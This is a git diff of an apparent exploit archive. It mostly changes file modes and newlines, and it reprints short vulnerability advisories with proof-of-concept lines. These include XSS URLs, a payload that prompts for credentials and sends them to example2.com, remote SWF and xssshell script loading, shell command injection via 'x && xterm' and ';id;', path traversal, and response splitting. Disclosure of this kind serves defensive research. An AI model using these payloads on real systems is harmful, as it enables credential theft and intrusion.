+++ b/platforms/multiple/remote/29931.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to gain unauthorized access to the applicati ManageEngine Password Manager Pro Free edition is vulnerable; other versions may also be affected. -$mysql -h example.com --port 2345 -u root \ No newline at end of file +$mysql -h example.com --port 2345 -u root \ No newline at end of file diff --git a/platforms/multiple/remote/300.c b/platforms/multiple/remote/300.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30025.txt b/platforms/multiple/remote/30025.txt old mode 100755 new mode 100644 index 1bccf3484..7b5ba12e9 --- a/platforms/multiple/remote/30025.txt +++ b/platforms/multiple/remote/30025.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br TeamSpeak Server 2.0.20.1 is vulnerable; other versions may also be affected. -http://www.example.com:14534/error_box.html?error_title=session expired - please login&error_text=<form action="http://127.0.0.1:31338/own.cgi">User:<inputtype="text"><br>Pass: <input type="password"><br><br><input type="submit"></form>&error_url=index.html http://www.example.com:14534/ok_box.html?ok_title=%3Cscript%3Ealert('hello')%3C/script%3E \ No newline at end of file +http://www.example.com:14534/error_box.html?error_title=session expired - please login&error_text=<form action="http://127.0.0.1:31338/own.cgi">User:<inputtype="text"><br>Pass: <input type="password"><br><br><input type="submit"></form>&error_url=index.html http://www.example.com:14534/ok_box.html?ok_title=%3Cscript%3Ealert('hello')%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/remote/30052.txt b/platforms/multiple/remote/30052.txt old mode 100755 new mode 100644 index 4fdfa41e5..0d3be87e5 --- a/platforms/multiple/remote/30052.txt +++ b/platforms/multiple/remote/30052.txt @@ -12,4 +12,4 @@ The following Tomcat versions are affected: 5.5.0 to 5.5.23 6.0.0 to 6.0.10 -http://www.example.com/tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(document.domain)</script> \ No newline at end of file +http://www.example.com/tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(document.domain)</script> \ No newline at end of file diff --git a/platforms/multiple/remote/30078.js b/platforms/multiple/remote/30078.js old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30218.txt b/platforms/multiple/remote/30218.txt old mode 100755 new mode 100644 index 55a1c79fd..d83c7df5e --- a/platforms/multiple/remote/30218.txt +++ b/platforms/multiple/remote/30218.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to gain access to sensitive information. Info This issue affects HTTP Server 1.6.2; other versions may also be affected. -http://www.example.com/test.htm%20 \ No newline at end of file +http://www.example.com/test.htm%20 \ No newline at end of file diff --git a/platforms/multiple/remote/30219.txt b/platforms/multiple/remote/30219.txt old mode 100755 new mode 100644 index 1eb23f9b5..02f2621fb --- a/platforms/multiple/remote/30219.txt +++ b/platforms/multiple/remote/30219.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to access sensitive information that may lead This issue affects MyServer 0.8.9; other versions may also be affected. -http://www.example.com/cgi-bin/post.mscgI (Note: Capital 'I' at the end of the URI) \ No newline at end of file +http://www.example.com/cgi-bin/post.mscgI (Note: Capital 'I' at the end of the URI) \ No newline at end of file diff --git a/platforms/multiple/remote/30222.txt b/platforms/multiple/remote/30222.txt old mode 100755 new mode 100644 index c3d4751e7..d451063d9 --- a/platforms/multiple/remote/30222.txt +++ b/platforms/multiple/remote/30222.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MyServer 0.8.9 is vulnerable; other versions may also be affected. -http://localhost/cgi-bin/post.mscgi Post:<script>alert('xss');</script> \ No newline at end of file +http://localhost/cgi-bin/post.mscgi Post:<script>alert('xss');</script> \ No newline at end of file diff --git a/platforms/multiple/remote/30229.txt b/platforms/multiple/remote/30229.txt old mode 100755 new mode 100644 index e34848642..01bcc2529 --- a/platforms/multiple/remote/30229.txt +++ b/platforms/multiple/remote/30229.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to access sensitive information that may lead This issue affects SHTTPD 1.38; other versions may also be affected. -http://www.example.com/test.php%20 \ No newline at end of file +http://www.example.com/test.php%20 \ No newline at end of file diff --git a/platforms/multiple/remote/30231.txt b/platforms/multiple/remote/30231.txt old mode 100755 new mode 100644 index 0f37d7835..29707e287 --- a/platforms/multiple/remote/30231.txt +++ b/platforms/multiple/remote/30231.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Key Focus Web Server 3.1.0; other versions may also be affected. -http://www.example.com:9727/index.wkf?opmenu=0&opsubmenu=aaaa%22%3E%3Cscript%3Ealert('xss');%3C/script%3E \ No newline at end of file +http://www.example.com:9727/index.wkf?opmenu=0&opsubmenu=aaaa%22%3E%3Cscript%3Ealert('xss');%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/remote/30256.txt b/platforms/multiple/remote/30256.txt old mode 100755 new mode 100644 index 4bc616379..1459a2069 --- a/platforms/multiple/remote/30256.txt +++ b/platforms/multiple/remote/30256.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to inject HTML and script code into t http://www.example.com:8004/pls/MSBEP004/<script>alert("XSS")</script> -http://www.example.com:8004/pls/<script>alert("XSS")</script> \ No newline at end of file +http://www.example.com:8004/pls/<script>alert("XSS")</script> \ No newline at end of file diff --git a/platforms/multiple/remote/30264.txt b/platforms/multiple/remote/30264.txt old mode 100755 new mode 100644 index a43d282ed..a12d820a4 --- a/platforms/multiple/remote/30264.txt +++ b/platforms/multiple/remote/30264.txt @@ -30,4 +30,4 @@ Timeout--5,, Community--public,, ServerName--bcmes,, Servername--127.0.0.1;id;,, # vulnerable parameter -SType--Server \ No newline at end of file +SType--Server \ No newline at end of file diff --git a/platforms/multiple/remote/30265.txt b/platforms/multiple/remote/30265.txt old mode 100755 new mode 100644 index 843cb12fb..df2ca23b7 --- a/platforms/multiple/remote/30265.txt +++ b/platforms/multiple/remote/30265.txt @@ -11,4 +11,4 @@ Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Host: sapserver:8100 -Proxy-Connection: Keep-Alive \ No newline at end of file +Proxy-Connection: Keep-Alive \ No newline at end of file diff --git a/platforms/multiple/remote/30279.txt b/platforms/multiple/remote/30279.txt old mode 100755 new mode 100644 index 42d26c9b2..9b5654457 --- a/platforms/multiple/remote/30279.txt +++ b/platforms/multiple/remote/30279.txt @@ -4,4 +4,4 @@ SAP Internet Graphics Server is prone to a cross-site scripting vulnerability be An attacker may perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/ADM:GETLOGFILE?PARAMS=<script>alert("hello")</script> \ No newline at end of file +http://www.example.com/ADM:GETLOGFILE?PARAMS=<script>alert("hello")</script> \ No newline at end of file diff --git a/platforms/multiple/remote/30288.txt b/platforms/multiple/remote/30288.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30491.java b/platforms/multiple/remote/30491.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30495.html b/platforms/multiple/remote/30495.html old mode 100755 new mode 100644 index a03f50176..7b68a724d --- a/platforms/multiple/remote/30495.html +++ b/platforms/multiple/remote/30495.html @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to inject HTML and script code into t Apache Tomcat 5.5.0 through 5.5.24 and 6.0.0 through 6.0.13 are affected. -<form action="http://localhost:8080/host-manager/html/add" method="get"> <input type="hidden" NAME='name' VALUE="aaa"> <input type="hidden" NAME='aliases' VALUE="<script>alert()</script>"> <input type="submit"> </form> \ No newline at end of file +<form action="http://localhost:8080/host-manager/html/add" method="get"> <input type="hidden" NAME='name' VALUE="aaa"> <input type="hidden" NAME='aliases' VALUE="<script>alert()</script>"> <input type="submit"> </form> \ No newline at end of file diff --git a/platforms/multiple/remote/30496.txt b/platforms/multiple/remote/30496.txt old mode 100755 new mode 100644 index 2957ecfeb..e26c8e9e5 --- a/platforms/multiple/remote/30496.txt +++ b/platforms/multiple/remote/30496.txt @@ -8,4 +8,4 @@ Versions prior to Apache Tomcat 6.0.14 are vulnerable. http://www.example.com:8080/examples/servlets/servlet/CookieExample?cookiename=HAHA&cookievalue=%5C%22FOO%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2F%3B -http://www.example.com:8080/servlets-examples/servlet/CookieExample?cookiename=BLOCKER&cookievalue=%5C%22A%3D%27%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2Fservlets-examples%2Fservlet+%3B \ No newline at end of file +http://www.example.com:8080/servlets-examples/servlet/CookieExample?cookiename=BLOCKER&cookievalue=%5C%22A%3D%27%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%3B+Path%3D%2Fservlets-examples%2Fservlet+%3B \ No newline at end of file diff --git a/platforms/multiple/remote/30499.txt b/platforms/multiple/remote/30499.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30507.txt b/platforms/multiple/remote/30507.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30508.txt b/platforms/multiple/remote/30508.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30521.txt b/platforms/multiple/remote/30521.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30523.txt b/platforms/multiple/remote/30523.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30630.c b/platforms/multiple/remote/30630.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30631.txt b/platforms/multiple/remote/30631.txt old mode 100755 new mode 100644 index 3f31329ea..b10aa5921 --- a/platforms/multiple/remote/30631.txt +++ b/platforms/multiple/remote/30631.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Google Mini Search Appliance 3.4.14; other versions may also be affected. -http://www.example.com/search?ie=[ Evil Code ]&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x' \ No newline at end of file +http://www.example.com/search?ie=[ Evil Code ]&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x' \ No newline at end of file diff --git a/platforms/multiple/remote/30643.txt b/platforms/multiple/remote/30643.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30678.java b/platforms/multiple/remote/30678.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30729.txt b/platforms/multiple/remote/30729.txt old mode 100755 new mode 100644 index 9af20d10a..af9cfe5a4 --- a/platforms/multiple/remote/30729.txt +++ b/platforms/multiple/remote/30729.txt @@ -8,4 +8,4 @@ Versions prior to ProxySG 4.2.6.1 and 5.2.2.5 are vulnerable. NOTE: This BID originally covered one issue, but was updated to also cover a second issue. -https://www.example.com:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00 https://www.example.com:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!-- Example Payload: <script> do { a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME",""); b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD",""); }while(a==null || b==null || a=="" || b==""); alert("owned!:"+a+"/"+b);window.location="http://www.example2.com/?u="+a+"&p="+b </script><!-- \ No newline at end of file +https://www.example.com:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00 https://www.example.com:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!-- Example Payload: <script> do { a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME",""); b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD",""); }while(a==null || b==null || a=="" || b==""); alert("owned!:"+a+"/"+b);window.location="http://www.example2.com/?u="+a+"&p="+b </script><!-- \ No newline at end of file diff --git a/platforms/multiple/remote/30742.txt b/platforms/multiple/remote/30742.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30768.txt b/platforms/multiple/remote/30768.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30771.txt b/platforms/multiple/remote/30771.txt old mode 100755 new mode 100644 index 9a2d9954a..7e0c93ed8 --- a/platforms/multiple/remote/30771.txt +++ b/platforms/multiple/remote/30771.txt @@ -4,4 +4,4 @@ Aruba MC-800 Mobility Controller is prone to an HTML-injection vulnerability bec Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible. -https://www.example.com:4343/screens/%22/%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file +https://www.example.com:4343/screens/%22/%3E%3Cscript%3Ealert(1)%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/remote/30838.html b/platforms/multiple/remote/30838.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30850.txt b/platforms/multiple/remote/30850.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30905.txt b/platforms/multiple/remote/30905.txt old mode 100755 new mode 100644 index 14b8dcbea..dca368416 --- a/platforms/multiple/remote/30905.txt +++ b/platforms/multiple/remote/30905.txt @@ -4,4 +4,4 @@ Adobe Flash Player is prone to a cross-site scripting vulnerability because the An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)// \ No newline at end of file +http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)// \ No newline at end of file diff --git a/platforms/multiple/remote/30933.php b/platforms/multiple/remote/30933.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30944.txt b/platforms/multiple/remote/30944.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/30972.txt b/platforms/multiple/remote/30972.txt old mode 100755 new mode 100644 index 71f746fc9..9c06cb891 --- a/platforms/multiple/remote/30972.txt +++ b/platforms/multiple/remote/30972.txt @@ -6,4 +6,4 @@ A successful exploit will allow an attacker to compromise the application and th NOTE: This vulnerability was initially considered a cross-site scripting issue, but further analysis reveals that this is a remote code-execution vulnerability. -http://www.example.com/Example_controller.swf?csPreloader=http://www.example2.com/DoKnowEvil.swf%3f \ No newline at end of file +http://www.example.com/Example_controller.swf?csPreloader=http://www.example2.com/DoKnowEvil.swf%3f \ No newline at end of file diff --git a/platforms/multiple/remote/30973.txt b/platforms/multiple/remote/30973.txt old mode 100755 new mode 100644 index 1453cf534..1e4b6b6b2 --- a/platforms/multiple/remote/30973.txt +++ b/platforms/multiple/remote/30973.txt @@ -4,4 +4,4 @@ InfoSoft FusionCharts is prone to a remote code-execution vulnerability because An attacker can exploit this issue to execute malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//www.example2.com/DoKnowEvil.swf%3F.jpg%22%3E \ No newline at end of file +http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//www.example2.com/DoKnowEvil.swf%3F.jpg%22%3E \ No newline at end of file diff --git a/platforms/multiple/remote/31010.sql b/platforms/multiple/remote/31010.sql old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31047.txt b/platforms/multiple/remote/31047.txt old mode 100755 new mode 100644 index f7fe328b6..8f564d0be --- a/platforms/multiple/remote/31047.txt +++ b/platforms/multiple/remote/31047.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to sIFR 2.0.3 and 3r278 are vulnerable. -https://www.example.com/<fontname>.swf?txt=<a href="http://www.example2.com">click me!</a> http://www.example.com/fonts/FuturaLt.swf?txt=%3Ca%20href=%22javascript:alert(document.cookie)%22%3Eclick%20me!%3C/a%3E&textalign=left&offsetTop=-2&textcolor= \ No newline at end of file +https://www.example.com/<fontname>.swf?txt=<a href="http://www.example2.com">click me!</a> http://www.example.com/fonts/FuturaLt.swf?txt=%3Ca%20href=%22javascript:alert(document.cookie)%22%3Eclick%20me!%3C/a%3E&textalign=left&offsetTop=-2&textcolor= \ No newline at end of file diff --git a/platforms/multiple/remote/31050.php b/platforms/multiple/remote/31050.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31106.txt b/platforms/multiple/remote/31106.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31119.txt b/platforms/multiple/remote/31119.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31130.txt b/platforms/multiple/remote/31130.txt old mode 100755 new mode 100644 index 484e8ed9f..0b81ab261 --- a/platforms/multiple/remote/31130.txt +++ b/platforms/multiple/remote/31130.txt @@ -16,4 +16,4 @@ Cookie: name1=moi +++ http://www.example.com/examples/servlets/servlet/CookieExample?cookiename=test&cookievalue=test%5c%5c%22%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC% -3B+Path%3D%2Fservlets-examples%2Fservlet+%3B \ No newline at end of file +3B+Path%3D%2Fservlets-examples%2Fservlet+%3B \ No newline at end of file diff --git a/platforms/multiple/remote/31279.txt b/platforms/multiple/remote/31279.txt old mode 100755 new mode 100644 index 09b09e358..bd9f0b947 --- a/platforms/multiple/remote/31279.txt +++ b/platforms/multiple/remote/31279.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Lotus Quickr 8.0 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/main.nsf/h_Toc/2a922d48c75dd00b052567080016723a/?OpenDocument&Count='20"><iframe/%20/onload=alert(/XSSByNirG/<http://www.example.com/QuickPlace/leg/main.nsf/h_Toc/2a922d48c75dd00b052567080016723a/?OpenDocument&Count='20%22%3E%3Ciframe/%20/onload=alert(/XSSByNirG/>)> \ No newline at end of file +http://www.example.com/[path]/main.nsf/h_Toc/2a922d48c75dd00b052567080016723a/?OpenDocument&Count='20"><iframe/%20/onload=alert(/XSSByNirG/<http://www.example.com/QuickPlace/leg/main.nsf/h_Toc/2a922d48c75dd00b052567080016723a/?OpenDocument&Count='20%22%3E%3Ciframe/%20/onload=alert(/XSSByNirG/>)> \ No newline at end of file diff --git a/platforms/multiple/remote/31362.txt b/platforms/multiple/remote/31362.txt old mode 100755 new mode 100644 index f2a2c1525..cd16a0bf6 --- a/platforms/multiple/remote/31362.txt +++ b/platforms/multiple/remote/31362.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Neptune Web Server Professional Edition 3.0 is vulnerable; other versions may also be affected. -http://www.example.com/<IMG SRC="javascript:alert('XSS');"> \ No newline at end of file +http://www.example.com/<IMG SRC="javascript:alert('XSS');"> \ No newline at end of file diff --git a/platforms/multiple/remote/31551.txt b/platforms/multiple/remote/31551.txt old mode 100755 new mode 100644 index 31fc7b49e..811be9709 --- a/platforms/multiple/remote/31551.txt +++ b/platforms/multiple/remote/31551.txt @@ -8,4 +8,4 @@ Tomcat 4.0.3 running on Windows is vulnerable; other versions may also be affect The following example request is available: -GET /lpt9.xtp \ No newline at end of file +GET /lpt9.xtp \ No newline at end of file diff --git a/platforms/multiple/remote/31756.txt b/platforms/multiple/remote/31756.txt old mode 100755 new mode 100644 index 638a8b637..48a8b124c --- a/platforms/multiple/remote/31756.txt +++ b/platforms/multiple/remote/31756.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SonicWALL Email Security 6.1.1 is vulnerable; other versions may also be affected. -GET /blah.htm HTTP/1.1 Host: "><script>alert('XSS');</script> \ No newline at end of file +GET /blah.htm HTTP/1.1 Host: "><script>alert('XSS');</script> \ No newline at end of file diff --git a/platforms/multiple/remote/31757.txt b/platforms/multiple/remote/31757.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31770.txt b/platforms/multiple/remote/31770.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31890.txt b/platforms/multiple/remote/31890.txt old mode 100755 new mode 100644 index 9346e2411..cd84fbd08 --- a/platforms/multiple/remote/31890.txt +++ b/platforms/multiple/remote/31890.txt @@ -6,4 +6,4 @@ An attacker can exploit the HTML-injection issue to run arbitrary HTML and scrip The attacker can exploit the information-disclosure issue via successful man-in-the-middle attacks. Information harvested may aid in further attacks. -<script src="http://example.com/xssshell/"></script> \ No newline at end of file +<script src="http://example.com/xssshell/"></script> \ No newline at end of file diff --git a/platforms/multiple/remote/31901.txt b/platforms/multiple/remote/31901.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31912.txt b/platforms/multiple/remote/31912.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31918.txt b/platforms/multiple/remote/31918.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31920.txt b/platforms/multiple/remote/31920.txt old mode 100755 new mode 100644 index cb2cd0e70..0c4aec72c --- a/platforms/multiple/remote/31920.txt +++ b/platforms/multiple/remote/31920.txt @@ -8,4 +8,4 @@ Secure FTP 2.5.15 for Microsoft Windows is vulnerable; other versions may also b Response to LIST: -\..\..\..\..\..\..\..\..\..\testfile.txt\r\n \ No newline at end of file +\..\..\..\..\..\..\..\..\..\testfile.txt\r\n \ No newline at end of file diff --git a/platforms/multiple/remote/31921.txt b/platforms/multiple/remote/31921.txt old mode 100755 new mode 100644 index c4558f003..a08fc513f --- a/platforms/multiple/remote/31921.txt +++ b/platforms/multiple/remote/31921.txt @@ -23,4 +23,4 @@ Response to MLSD (forward-slash): type=file;modify=20080227074710;size=20; /../../../../../../../../../testfile.txt\r\n Response to MLSD (combination): -type=file;modify=20080227074710;size=20; ../..\/..\/..\/../..\/../..\/../testfile.txt\r\n \ No newline at end of file +type=file;modify=20080227074710;size=20; ../..\/..\/..\/../..\/../..\/../testfile.txt\r\n \ No newline at end of file diff --git a/platforms/multiple/remote/31922.txt b/platforms/multiple/remote/31922.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31923.txt b/platforms/multiple/remote/31923.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31924.txt b/platforms/multiple/remote/31924.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31925.txt b/platforms/multiple/remote/31925.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31926.txt b/platforms/multiple/remote/31926.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31927.txt b/platforms/multiple/remote/31927.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31928.txt b/platforms/multiple/remote/31928.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/31936.txt b/platforms/multiple/remote/31936.txt old mode 100755 new mode 100644 index bc18774a0..11d10a6cb --- a/platforms/multiple/remote/31936.txt +++ b/platforms/multiple/remote/31936.txt @@ -14,4 +14,4 @@ Response to LIST (forward-slash): /../../../../../../../../../testfile.txt\r\n Response to LIST (backslash and forward-slash): -../..\/..\/..\/../..\/../..\/../testfile.txt\r\n \ No newline at end of file +../..\/..\/..\/../..\/../..\/../testfile.txt\r\n \ No newline at end of file diff --git a/platforms/multiple/remote/31941.txt b/platforms/multiple/remote/31941.txt old mode 100755 new mode 100644 index d48edc918..275ab9744 --- a/platforms/multiple/remote/31941.txt +++ b/platforms/multiple/remote/31941.txt @@ -8,4 +8,4 @@ Versions prior to WISE-FTP 5.5.9 are vulnerable. Response to LIST: -\..\..\..\..\..\..\..\..\..\testfile.txt\r\n \ No newline at end of file +\..\..\..\..\..\..\..\..\..\testfile.txt\r\n \ No newline at end of file diff --git a/platforms/multiple/remote/31942.txt b/platforms/multiple/remote/31942.txt old mode 100755 new mode 100644 index 4d7f82cca..819e9273b --- a/platforms/multiple/remote/31942.txt +++ b/platforms/multiple/remote/31942.txt @@ -9,4 +9,4 @@ Classic FTP 1.02 for Microsoft Windows is vulnerable; other versions may also be Response to LIST: \..\..\..\..\..\..\..\..\..\testfile.txt\r\n -/../../../../../../../../../testfile.txt\r\n \ No newline at end of file +/../../../../../../../../../testfile.txt\r\n \ No newline at end of file diff --git a/platforms/multiple/remote/32084.txt b/platforms/multiple/remote/32084.txt old mode 100755 new mode 100644 index aa080ba7d..8e62673e1 --- a/platforms/multiple/remote/32084.txt +++ b/platforms/multiple/remote/32084.txt @@ -10,4 +10,4 @@ Name a folder the following: ' x && xterm &# A shared folder containing this named folder will execute the following command: -/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'x && xterm &#"' -D "/poc" \ No newline at end of file +/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'x && xterm &#"' -D "/poc" \ No newline at end of file diff --git a/platforms/multiple/remote/32110.txt b/platforms/multiple/remote/32110.txt old mode 100755 new mode 100644 index fc5b5455e..b457e9aef --- a/platforms/multiple/remote/32110.txt +++ b/platforms/multiple/remote/32110.txt @@ -13,4 +13,4 @@ The following special character in a filename can evade firewall rules: ASCII:? ? ? &#8227; &#8228; &#8229; ? HEX: 86 20 87 20 95 20 26 23 38 32 32 37 3b 20 26 23 38 32 32 38 3b 20 -26 23 38 32 32 39 3b 20 85 \ No newline at end of file +26 23 38 32 32 39 3b 20 85 \ No newline at end of file diff --git a/platforms/multiple/remote/32137.txt b/platforms/multiple/remote/32137.txt old mode 100755 new mode 100644 index 174f4ea27..0ef3899a6 --- a/platforms/multiple/remote/32137.txt +++ b/platforms/multiple/remote/32137.txt @@ -12,4 +12,4 @@ Tomcat 6.0.0 through 6.0.16 Tomcat 3.x, 4.0.x, and 5.0.x may also be affected. -http://www.example.com/page.jsp?blah=/../WEB-INF/web.xml \ No newline at end of file +http://www.example.com/page.jsp?blah=/../WEB-INF/web.xml \ No newline at end of file diff --git a/platforms/multiple/remote/32138.txt b/platforms/multiple/remote/32138.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32167.txt b/platforms/multiple/remote/32167.txt old mode 100755 new mode 100644 index 79b316b43..e05e60504 --- a/platforms/multiple/remote/32167.txt +++ b/platforms/multiple/remote/32167.txt @@ -14,4 +14,4 @@ Host: www.blocked.org GET / HTTP/1.0 X-Decoy: Host: www.allowed.org -Host: www.blocked.org \ No newline at end of file +Host: www.blocked.org \ No newline at end of file diff --git a/platforms/multiple/remote/32363.txt b/platforms/multiple/remote/32363.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/32382.txt b/platforms/multiple/remote/32382.txt old mode 100755 new mode 100644 index 5140019e8..e34f8d630 --- a/platforms/multiple/remote/32382.txt +++ b/platforms/multiple/remote/32382.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue by constructing a script that would send un This issue affects Accellion File Transfer Appliance prior to FTA_7_0_189. -https://www.example.com/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> HTTP HEADER: Host: [Accelion web server] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv: 1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> Content-Type: application/x-www-form-urlencoded Content-Length: 131 POST DATA: description=Could+you+please+close+this+tickets%0D%0A%0D%0ARegards&client_email=email_to_spam% 40victim_domain.com&submit=Soumettre+le+rapport \ No newline at end of file +https://www.example.com/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> HTTP HEADER: Host: [Accelion web server] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv: 1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1> Content-Type: application/x-www-form-urlencoded Content-Length: 131 POST DATA: description=Could+you+please+close+this+tickets%0D%0A%0D%0ARegards&client_email=email_to_spam% 40victim_domain.com&submit=Soumettre+le+rapport \ No newline at end of file diff --git a/platforms/multiple/remote/32458.txt b/platforms/multiple/remote/32458.txt old mode 100755 new mode 100644 index 39ebdd699..f3ef47db9 --- a/platforms/multiple/remote/32458.txt +++ b/platforms/multiple/remote/32458.txt @@ -7,4 +7,4 @@ Attackers can leverage this issue to influence or misrepresent how web content i Versions prior to OpenNMS 1.5.94 are vulnerable. http://www.example.com/opennms/event/query?%0D%0AContent-Length:%200%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text -/html%0D%0AContent-Length:%2036%0D%0A%0D%0A<html><body>BugSec</body></html><!-- \ No newline at end of file +/html%0D%0AContent-Length:%2036%0D%0A%0D%0A<html><body>BugSec</body></html><!-- \ No newline at end of file diff --git a/platforms/multiple/remote/32466.html b/platforms/multiple/remote/32466.html old mode 100755 new mode 100644 index a71c14eb5..5e128fc34 --- a/platforms/multiple/remote/32466.html +++ b/platforms/multiple/remote/32466.html @@ -21,4 +21,4 @@ IDList= Prop3=19,2 -<script> function a() { s=""; h=""; for(i=0;i<window.frames.length;i++) { d=window.frames[i].document; for(j=0;j<d.links.length;j++) { u=d.links[j].text s+=u+"\n"; h+="<img src=\""+u+"\">"; } } document.getElementById("t").value=s; document.getElementById("x").innerHTML=h; } </script> 